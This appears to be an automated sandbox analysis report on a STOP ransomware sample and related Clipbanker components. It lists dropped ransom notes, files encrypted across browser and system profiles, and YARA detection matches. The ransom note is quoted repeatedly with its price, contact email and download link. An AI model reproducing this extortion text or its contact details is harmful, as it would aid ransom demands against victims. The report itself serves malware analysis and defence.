Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7fa4f3cd-f899-4abc-9ee3-31954eeeae00}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~cust	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\$WinREAgent\Scratch\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\Users\jones\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file

Writes many files with high entropy

Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg entropy: 7.9972815415	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{09d41dfb-343c-4c64-80de-0d8ebc18a6b9}\Apps.ft entropy: 7.99606416018	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{407fe2cc-e6ee-4027-aa00-b9fdf3f5b8e5}\0.0.filtertrie.intermediate.txt entropy: 7.99501322308	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{407fe2cc-e6ee-4027-aa00-b9fdf3f5b8e5}\Apps.ft entropy: 7.99630082306	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fe191046-14e8-4e49-a1f5-f429b2cab500}\0.0.filtertrie.intermediate.txt entropy: 7.99494323525	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fe191046-14e8-4e49-a1f5-f429b2cab500}\Apps.ft entropy: 7.99625430983	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite entropy: 7.99782047452	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm entropy: 7.99440118908	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extensions.json entropy: 7.99564797422	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm entropy: 7.99484848224	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite entropy: 7.99794244234	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{764e754d-fbdd-43df-9a27-cbb01dbf5078}\settingsglobals.txt entropy: 7.99603497915	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{764e754d-fbdd-43df-9a27-cbb01dbf5078}\settingssynonyms.txt entropy: 7.99831612302	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99424341354	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite entropy: 7.99758801283	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm entropy: 7.99400985366	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99856327341	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm entropy: 7.99372797459	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite entropy: 7.99811281887	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99781333085	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico entropy: 7.99867362714	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99845883427	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db entropy: 7.99579507464	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico entropy: 7.99733099531	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml entropy: 7.9923683457	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.99752940284	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99233122789	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm entropy: 7.99438488563	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.99834613663	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99768010462	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99448189766	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DL2P1Z6X\pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7[1].js entropy: 7.99191962208	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\IINQQITY\pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7[1].js entropy: 7.99454333944	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml entropy: 7.99400170358	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DL2P1Z6X\sharedscripts-939520eada[1].js entropy: 7.99602027292	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DL2P1Z6X\staticpwascripts-30998bff8f[1].js entropy: 7.99151353087	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\IINQQITY\pwa-bootstrap-5e7af218e953d095fabf[1].js entropy: 7.99747176827	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\LCNHN4MU\pwa-bundle-994d8943fc9264e2f8d3[1].css entropy: 7.99797401094	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\LCNHN4MU\otel-logger-104bffe9378b8041455c[1].js entropy: 7.99803845753	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\IINQQITY\thirdpartynotice[1].htm entropy: 7.99812169117	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\hero-image-desktop-f6720a4145[1].jpg entropy: 7.99869458876	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\microsoft-365-logo-01d5ecd01a[1].png entropy: 7.99165732054	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7[1].css entropy: 7.99572126397	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js entropy: 7.99606946202	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\bootstrap_3.3.0_B68S-_daR6nLiLVZsh4XiA2[1].js entropy: 7.99503242913	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2[1].js entropy: 7.99200572659	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\LCNHN4MU\pwa-mru.9ba2d4c9e339ba497e10.chunk.v7[1].js entropy: 7.99576473501	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\AC\INetCache\GOGXYOSL\1446_8.53.0[1].json entropy: 7.99868349208	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\DLAKQVF0\accountcorepackage_7RPOlbJQzUEPp9Cr7jKSkg2[1].js entropy: 7.99674148084	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js entropy: 7.99783392581	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\knockout_old_GJ62c6D9R5HuKFdkoO8XYw2[1].js entropy: 7.99765016412	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\I8BK050T\jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js entropy: 7.998077835	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\I8BK050T\lwsignuphoststringscountrybirthdate_en-gb_tXeUWmrL4gUQDx-AaHVz2g2[1].js entropy: 7.99465943577	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99719653437	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99602168894	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99243757391	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.9926170532	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.9922022504	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99238683786	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99339908654	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000010.db entropy: 7.99828637478	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000011.db entropy: 7.99830563002	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db entropy: 7.99741106909	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99820591351	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99297719272	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99719262863	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\IconCache.db entropy: 7.99306300377	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\Local Settings\IconCache.db.bgjs (copy) entropy: 7.99306300377	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\Local Settings\Temp\wctEA40.tmp.bgjs (copy) entropy: 7.99762679	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.bgjs (copy) entropy: 7.99752940284	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgjs (copy) entropy: 7.99233122789	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm.bgjs (copy) entropy: 7.99438488563	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgjs (copy) entropy: 7.99719653437	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgjs (copy) entropy: 7.99602168894	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.bgjs (copy) entropy: 7.99243757391	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.bgjs (copy) entropy: 7.9926170532	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.bgjs (copy) entropy: 7.9922022504	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.bgjs (copy) entropy: 7.99238683786	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.bgjs (copy) entropy: 7.99339908654	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000010.db.bgjs (copy) entropy: 7.99828637478	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000011.db.bgjs (copy) entropy: 7.99830563002	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.bgjs (copy) entropy: 7.99741106909	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.bgjs (copy) entropy: 7.99820591351	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.bgjs (copy) entropy: 7.99297719272	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.bgjs (copy) entropy: 7.99719262863	Jump to dropped file
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199673019888[1].htm entropy: 7.99525587095	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
